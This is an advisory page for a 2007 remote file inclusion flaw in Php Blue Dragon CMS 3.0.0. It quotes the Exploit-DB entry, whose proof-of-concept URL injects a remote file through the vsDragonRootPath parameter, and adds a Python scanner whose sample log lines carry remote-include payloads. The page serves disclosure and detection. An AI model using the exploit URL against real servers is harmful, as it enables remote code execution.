Vendor: Php Blue Dragon CMS
By: Kacper
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: Php Blue Dragon CMS
Affected Version From: Php Blue Dragon CMS version 3.0.0
Affected Version To: Php Blue Dragon CMS version 3.0.0
Patch Exists: NO
2007

Php Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability

This vulnerability allows an attacker to remotely include files in Php Blue Dragon CMS version 3.0.0 by manipulating the 'vsDragonRootPath' parameter of the 'activecontent.php' file. By injecting malicious code through this parameter, an attacker can execute arbitrary code on the target system.

Mitigation:

To mitigate this vulnerability, update to a patched version of Php Blue Dragon CMS or apply any relevant security patches provided by the vendor. In addition, implement proper input validation and sanitization to prevent remote file inclusion attacks.

Exploit-DB raw data:

// Exploit Name: Php Blue Dragon CMS 3.0.0 Remote File Inclusion Vulnerability
//Script Homepage: http://phpbluedragon.pl/

// Author: Kacper [kacper1964@yahoo.pl]
// Author Homepage: devilteam.eu  |  kacper.bblog.pl

//Greetings to everyone from DEVIL TEAM, come join us on IRC!
//Irc: irc.milw0rm.com:6667 #devilteam

//Hi

Vulnerability:


http://127.0.0.1/~phpbluedragon3.0.0/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=[evil_code?]

# milw0rm.com [2007-08-10]
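
To check web server access logs for the request pattern above, the following added example (not part of the original advisory or Exploit-DB entry) flags requests to activecontent.php that carry vsDragonRootPath. It assumes common/combined log format and that legitimate clients never send this parameter; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script path and parameter named in the advisory.
TARGET_SUFFIX = "/public_includes/pub_blocks/activecontent.php"
PARAM = "vsDragonRootPath"

# Request line of a common/combined-format access log entry.
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')
# URL schemes / PHP stream wrappers that point include() away from a local path.
SCHEME_RE = re.compile(r"^\s*(?:https?|ftps?|php|data|expect|phar|zip)\s*:", re.I)

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (bounded) so encoded probes still match."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return None, 'param-present' or 'remote-include' for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not fully_decode(url.path).endswith(TARGET_SUFFIX):
        return None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        if name == PARAM:  # assumption: clients never send this legitimately
            remote = SCHEME_RE.match(fully_decode(value))
            return "remote-include" if remote else "param-present"
    return None

def scan(lines):
    """Return (line_number, verdict) for every flagged entry."""
    return [(n, v) for n, entry in enumerate(lines, 1) if (v := classify(entry))]

# Constructed sample entries (documentation IPs, reserved .invalid host).
BASE = "/~phpbluedragon3.0.0" + TARGET_SUFFIX
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Aug/2007:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 5120',
    f'198.51.100.7 - - [10/Aug/2007:12:00:05 +0000] "GET {BASE}?{PARAM}=http://example.invalid/x.txt? HTTP/1.1" 200 312',
    f'198.51.100.7 - - [10/Aug/2007:12:00:09 +0000] "GET {BASE}?{PARAM}=%2568ttp%253A%252F%252Fexample.invalid%252Fx.txt HTTP/1.1" 200 312',
    f'192.0.2.44 - - [10/Aug/2007:12:01:30 +0000] "GET {BASE}?{PARAM}=../ HTTP/1.1" 200 98',
    f'192.0.2.10 - - [10/Aug/2007:12:02:00 +0000] "GET {BASE} HTTP/1.1" 200 98',
]
```

Calling `scan(SAMPLE_LOG)` reports entries 2 and 3 as `remote-include` and entry 4 as `param-present`; a `remote-include` hit with a 200 response is the one to triage first.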